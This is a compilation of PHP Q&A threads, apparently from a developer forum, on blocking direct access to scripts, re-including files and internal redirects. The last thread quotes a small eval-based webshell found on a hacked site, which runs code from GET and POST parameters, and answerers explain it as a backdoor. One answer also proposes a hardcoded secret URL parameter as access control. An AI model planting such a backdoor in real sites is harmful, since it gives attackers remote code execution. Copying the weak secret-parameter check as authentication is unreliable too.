Allow window.location but prevent direct access to a PHP file - php

I have a script file named script.php which is accessed from another php file called main.php through the "Window.location" command. I want to prevent direct access to file, i.e, no one can type script.php in the URL bar and view the contents of the file. But I want my main.php to be able to redirect to script.php using window.location. Any way to do this?
I have tried using Debug Backtrace and preg_match() but these are also blocking the window.location from main.php. Any way to get around this?

I'm not really sure what and why you want to do. There is no way to only allow a script to open a URL, because the browser will handle it.
Normally you should check in the files itself, if the user is allowed to use them. So you have to find a logic for you, how to tell you script, if the user should see it. Otherwise you can do some other action, like displaying an error or redirect him back to you main.php.
Just some quick ideas ...
Idea 1.) If possible, you can include() the script.php in main.php and block the direct access via .htaccess. Then you don't need a redirect and no one can access it directly.
Idea 2.) Set a session variable in main.php like $_SESSION["allow"] = true; and check this again in script.php. Afterwards set the value to false, so the next call will be fail.
Idea 3.) Add a parameter to the file call, like script.php?allow=true. But in this case, all users who know the parameter could call it.
Idea 4.) Add a custom parameter to the redirect, wich is only valid for a given time. To be simple, something like php time(). Check if the parameter is within a short time limit. But in this case, the redirect url has to be generated when the main.php file starts the redirect. Otherwise the request could be already to old.
So that are my ideas. Hope something gives you a hint how to do it.

Related

Include a php file twice?

I am working on a page that demands that a certain php code is included at runtime - however, at some point in the code below, the variable in that included file is to be rewritten by a remote curl POST request, so I need to re-include the file to read the new value of the variable.
Can I "include" it again to reload the new value? Or is a double include of the same file within the same code not allowed?
EDIT:
Here's what I'm doing exactly:
include a file, that contains 1 variable
run a check in an online API to make sure the URL from the variable is not in the database
if it is, initiate a cURL POST request to a page on my second domain, that starts a chain of events there
after that chain is completed, the second page sends a cURL request to another page on my first domain - the request contains another URL which it passes to a page on my first domain, which in turns grabs that and overwrites the initially included file with the new value for the variable
back to my initial code - I now have a new value for that previously included variable, so I need to "reload" it somehow, because I will be using it a bit later in the code of the same page; won't re-including the file be best?
I think you should move the "later part" of the code in your first PHP file to the file that overwrites your initial variable in #4. Else, move that code to new php file altogether.
You can also implement a web-hook kind of system where you'd pass the "variable" to the first code as a GET/POST parameter. So, the first time that code gets called it will check for the variable. If empty, then it does what you mentioned in steps 1-4.
Then step #4 calls that PHP code again, but passing a variable value. Hence, instead of executing the first part of the code, the file executes the later part.
In any event, your code seems to be too convulated, and is best to split it into functions and classes or something.
I ended up using the following:
$newly_updated_file = "file_with_variable.php";
$lines = file($newly_updated_file);
$new_variable = $lines[15];
Ought to do fine.

PHP how to pass `http request` object from one PHP file to another PHP file

usually when i want to redirect from one php page to another php page of same project i'm using
header("location:somepage.php");
This will cause more calls between client and server. What i want to do is instead of sending redirect header, i want to stop execution of requested page and pass request object or request information to the another page which i want to redirect. In this case single request will be enough. I guess this kind of functionality available in jsp. Is same thing available in php which i don't know?
As #DanSherwin commented, you probably want to use include. You might do something like this:
firstpage.php:
if(/* Some condition when you want to do a redirect */){
include 'somepage.php';
exit;
}
This runs the code from somepage.php immediately, as though it was cut and pasted into firstpage.php**, and then it exits right afterward as though you redirected away from firstpage.php.
** caveat: watch out for variable scope.

Prevent direct access using the define and defined function in PHP

I'm trying to use the define function and the defined function in order to avoid hotlinking / direct accessing a PHP script but for some reason it will not work.
The issue I'm having is that it simply will not work and i recieve the "Hotlinking is not allowed" message even if i visit index.php first and follow the link and / or the post form.
Here is an example of what i'm trying to do:
index.php
<?php
define("ACCEPT",TRUE);
?>
<html>
...
core.php
<?php
if (defined('ACCEPT'))
{
// ACCEPT is defined which means the user came here via index.php
}
else
{
// The user is most likely direct accessing core.php, abort.
echo "Hotlinking is not allowed";
exit;
}
Please note that the post "Preventing Direct Access, is it possible to spoof a php define?" does not answer my question nor does the post "define and defined for disallow direct access".
This is what a fair amount of programs do. Just create a header that checks for the definition and redirect/exit if it isn't defined. There is nothing wrong with doing it this way, but it just adds to the amount of lines/code each page will need. This can be confusing because the DEFINE needs to be in one place, then the page requested has to either be included, or needs to include the page that has the define. It is all about structure.
Here is something you can do:
.htaccess - redirects every request to index.php
index.php - Defines a variable, acts as a router that fetches/includes the page to be shown based on request data.
childpage.php - checks if variable exists (meaning it was included) and then does whatever needs to be done.
The other option is to place the sensitive code in am htaccess protected directory.
You can use a framework as well that does a lot of this.
Or, if your host allows you to edit your vhost config, which they probably won't if you only have access to a public directory, you can change the document root to a higher directory.

Is there a way to prevent the post viewed by the visitor?

Supposed the page is example.com/blog/data.php. I am using file_get_contents to get the content in another script page. Now, i want to:
Forbid google search to crawl and index the data.php page.
Forbid the visitor to access it
Is there a way to achieve this?
You can redirect to another page if the request url is example.com/blog/data.php, but a far easier and more logical solution would be to move the file out of your web-root.
Edit: If you really want to keep the file inside the web-root, you can use something like this at the top of the script that you don't want to access directly:
if ($_SERVER['REQUEST_URI'] === $_SERVER['SCRIPT_NAME'])
{
header('Location: /'); // redirect to home page
}
However, this will probably not work in combination with file_get_contents (you need to remove these lines from the result), you could include the file instead.
Don't put data.php under the web root. Keep it in a parallel directory.
You can pass token via GET. Overall your way is slightly wrong. Why don't you incorporate the data.php logic in the script that is calling it.
Simply apply access restriction for authorized users only. You are able to do it in the most simple way by accessing your page using url parama as password:
example.com/blog/data.php?secret=someblah
and in the first of your file data.php do the following:
<?php
if (!isset($_GET['secret']) || $_GET['secret'] != 'someblah')) exit();
?>
However,It is recommended, don't use this from public computer becuase it is not secure but it is the primitive authentication principle.

hacked website unusual php file

I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.
It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval

Categories